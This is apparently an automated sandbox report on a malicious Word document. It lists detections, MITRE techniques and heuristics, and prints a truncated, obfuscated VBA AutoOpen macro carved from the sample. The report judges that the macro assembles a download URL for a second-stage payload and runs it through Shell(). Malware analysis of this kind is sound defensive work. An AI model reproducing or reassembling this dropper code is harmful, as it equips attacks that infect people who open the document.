Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, which is a critical indicator of malicious activity. The script attempts to construct a URL from concatenated strings, likely to download and execute a secondary payload. The presence of the ClamAV detection 'Doc.Dropper.Agent-6447642-0' further supports its classification as a dropper.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6447642-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6447642-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://TEO+TEOwww.umbrTEO+TEOiaTEOGX (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28313 bytes |

SHA-256: 4fe53e97e32a8c01d071dc94a1507add62e3fc85ccb240471c6ab6573b469d41

Preview: first 1,000 lines of the extracted script (as carved, including the obfuscation junk statements; the preview is truncated):

```vba
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "XodNhRmGADEi" Sub AutoOpen() On Error Resume Next qqvjLRLhM = BzLniLqmATvT - Sgn(Qlb) - (1662083 - Tan(7165694) / 1095084 - ChrW(CJscpliBQfj)) qLhzmDpir = Kzc - Sgn(Xoi) - (9026326 - Tan(6997251) / 1702595 - ChrW(bdnsEiww)) jpVVkFHUQ = XTGNirLQcRzzGj - Sgn(JOiuHhUr) - (6517784 - Tan(2149684) / 2918321 - ChrW(csvQTOvMpTNw)) Application.Run "mvzSGPUJpVd", uowsAAaWWK wjoGjzhip = bqYaJSCbYCPBjX - Sgn(AdlLTjpAkw) - (5193777 - Tan(8699184) / 2738517 - ChrW(idjAd)) RErtEcKNu = iuwQZ - Sgn(VvWVSlqoci) - (4841846 - Tan(7790410) / 3300402 - ChrW(YiBGGcIjjjJT)) upBEicoiM = KfKfODRWDV - Sgn(EmAspJwWlPnLzq) - (225763 - Tan(7455522) / 4677804 - ChrW(wzm)) End Sub Function uowsAAaWWK() On Error Resume Next iAbEiE = IXQvY - Sgn(CYKSjzqFN) - (6854503 - Tan(2943590) / 1851622 - ChrW(KqLHHBwi)) PwPVTVHlAiD = FiKd - Sgn(pcWGas) - (3637239 - Tan(859332) / 135983 - ChrW(pMZqArUL)) aKqblWbSJK = rNTzPJuZsuS - Sgn(HFhAdrdpR) - (781619 - Tan(1072987) / 7970317 - ChrW(SubHiQkXZlCW)) nOjSiiMbI = NJJFsnzltXVQu + Mid(YhHv + "jJzFioNuiPIVuwXi+TEOasTEO+TEOdTEO+TEO.TEO+TEO9VE+9VEnextTGXY+GXYEO9VE'+'+9VE+9VE+'+'9VEGXY+GXYTEO(1TEO+TE9VE+9VEOklhXDco" + jGFEavOX, 17, 97) CbzflCHpHtV = zljJwdvHr - Sgn(ojRLQtBEzus) - (4178286 - Tan(1621605) / 6421955 - ChrW(APfzs)) chEfDtW = mMLZOKMVJLWSNb - Sgn(zwOoCdWklcc) - (9822451 - Tan(9426287) / 9689614 - ChrW(QHzmBW)) mOcNKciQ = mBip - Sgn(niVDvGcARQK) - (8084697 - Tan(3933777) / 2948382 - ChrW(ZwlLPWvvO)) JTpLqZCjqbf = GwfSaJhwhGs + Mid(WzrVUnHdJzPT + "jPLfMfICcGzE9'+'VE+9VETEO'+'eJfGXY+GXYL(tVGaTEO+TEOsfcTEO+T9VE+9VEEO.TEO+TEO'+'JfL9VE+9VEToStrYZhTEO+TEOiYTEO+T'+'EGXY+GXYOZhNgJfTEO+TEOL(TEO+TEO), T9VE+9VEEO+TEOtTEO+TEOVGSDwdwzKUElur" + KiiDiUf, 13, 162) KwSll = rnHkU 
- Sgn(PGFDEdajZJ) - (4707325 - Tan(755817) / 3653128 - ChrW(ZzuRJJmSNWwkm)) izjmAr = rPInNLFrrw - Sgn(jrGVWRMDfnssp) - (5248003 - Tan(2185643) / 8931145 - ChrW(sjGUqspKBkqHph)) sKnUjQv = wZdR - Sgn(zrFkjHuwWT) - (2379367 - Tan(355853) / 3353060 - ChrW(wIpYp)) zDXsPhHpmo = aZNtLMGMu + Mid(CQYhsUzwAwJ + "NOzECshtTEG9VE+9VEXY+GXY9VE'+'+'+'9VEO+TEOtps:/TEO+TEO/www.9VE+9VEnT9VE'+'kZnsIzUVYODjujVDComBsdqMvZjpFPP" + mujpQWZ, 7, 68) zPfLw = OHD - Sgn(wiTkH) - (213228 - Tan(4963567) / 4469257 - ChrW(HjGJWmmOKcwM)) zpfWwjaCiA = FGDQKiMiJh - Sgn(VmUoQjQpPiQ) - (6693493 - Tan(5691941) / 1722405 - ChrW(apoEfEw)) rWSIsKPYz = ZMjrqvK - Sgn(zzUnj) - (3393912 - Tan(9496781) / 9637995 - ChrW(LJzwoYZHs)) kjuplkAzaz = RLVjVwpFluQzuO + Mid(BdWniwrnhYopjj + "hNaaYnasRVCJEEOlicTEO+TEO TEO'+'+TEO+ K2TEO+TEOFjTEO+'+'TEOp1KTEOGXY+GXY+TEO2F +TEO+TEO TEO+TEOtVTEO+TEiWSMPcEUcUw" + IBnRPmWYPkSoMb, 14, 90) chLjH = swmPOWV - Sgn(olPtXV) - (7835144 - Tan(3171154) / 7279238 - ChrW(vizfj)) pdYiL = WAJncFbCQFal - Sgn(FTmWcljf) - (1516028 - Tan(9368720) / 3069601 - ChrW(qznvJTMRwtNMhl)) CZEjRW = JMdRuDtjrII - Sgn(uzIOEtnm) - (1401907 - Tan(7684222) / 1348191 - ChrW(mNTY)) DlLOhJYa = WpFBiXV + Mid(cjpZuEZSjJVhI + "jqCO+'+'T9VE'+'+9VEEOlienTEO+TEOtTEO+TEO;TEO+TEOt'+'VGNSBTEO+TEO =T9VE+9VEEO+TE9VE+9VEO tTEO+TEOGXY+G9VE+9VEXYVGTEO+TEOnTEO+TEGXY'+'+GXY9VE+9VEOsTEO+TEOaTEO+TEOdTE9VE+9VEOoHikEFHYGwot" + qaUuAUloHjwro, 4, 168) GTziT = UmjSjsY - Sgn(jZYroprUFqvA) - (6695587 - Tan(6381578) / 9135491 - ChrW(wrZD)) foRkaiwBt = IwoMdz - Sgn(DiPZu) - (78952 - Tan(9034384) / 7022626 - ChrW(BKmdlQplilnqc)) twqCoBYPD = pTVcbakf - Sgn(siQXa) - (4200451 - Tan(1185253) / 6616641 - ChrW(KNuhmZbsIDd)) LUvYKCj = FZpqBZSi + Mid(VwzRvmBwST + "qGEOFlTEOwTEOGXY+GXY+TE9VE+9VEOifi.'+'iTEO+TE9VE+9VEOtTEO+TEO/TEO+TEOUTEO+TEOe8JTEO+TEO/K2F.STEO+TEO'+'pTEO+TEOlit(TEGXY+GXYO+TEOK2TEO+TEOFTEO+TEO?K2TEO+TEOF)TEO+TEOfNtoVzOB" + iJStzcVFWfjj, 7, 158) wMjGNDFDB = ADXisdG - Sgn(toBoInMkRYcWks) - (5635998 - Tan(4142112) / 5952073 - 
ChrW(jjiNz)) dBDJrtwzQ = siiLEZoSukXsA - Sgn(ZcbajrEnhI) - ( ... (truncated)
```